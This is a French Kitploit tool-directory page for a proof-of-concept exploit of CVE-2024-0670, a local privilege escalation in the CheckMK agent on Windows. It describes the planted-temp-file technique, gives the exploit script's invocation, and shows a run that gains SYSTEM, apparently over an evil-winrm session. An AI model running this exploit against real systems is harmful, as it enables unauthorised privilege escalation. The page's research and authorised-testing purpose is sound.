Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-0670 — PoC pour CVE-2024-0670 | Kitploit
Outils/GitHubGitHub/magicrc/cve-2024-0670
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et Éducation
GitHubmagicrc/cve-2024-0670

CVE-2024-0670

PoC pour CVE-2024-0670

Voir le dépôt
1il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

CVE-2024-0670 PoC

Ce dépôt fournit un exploit de Preuve de concept (PoC) pour la vulnérabilité CVE-2024-0670, affectant l'agent CheckMK sur les systèmes Windows. La vulnérabilité se produit lorsque l'agent CheckMK crée et exécute des fichiers temporaires dans le répertoire C:\Windows\Temp. Un attaquant peut abuser de ce comportement en plaçant au préalable des fichiers malveillants dans ce répertoire avec une protection en écriture. Lorsque l'agent tente de créer un fichier temporaire qui existe déjà en lecture seule, il ne parvient pas à l'écraser mais exécute néanmoins le fichier existant avec les privilèges SYSTEM, permettant ainsi une élévation de privilèges.

Référence de l'avis : SEC Consult - Élévation locale de privilèges via des fichiers inscriptibles dans l'agent Checkmk


⚠️ AVERTISSEMENT

Ce projet est destiné uniquement à des fins éducatives, de recherche et de tests de sécurité autorisés.
N'utilisez pas ce code sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester.
L'auteur n'est pas responsable de tout dommage ou usage abusif.


Utilisation

root@kitploit:~
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"

Exemple

root@kitploit:~
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer... 
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system
Télécharger l’outil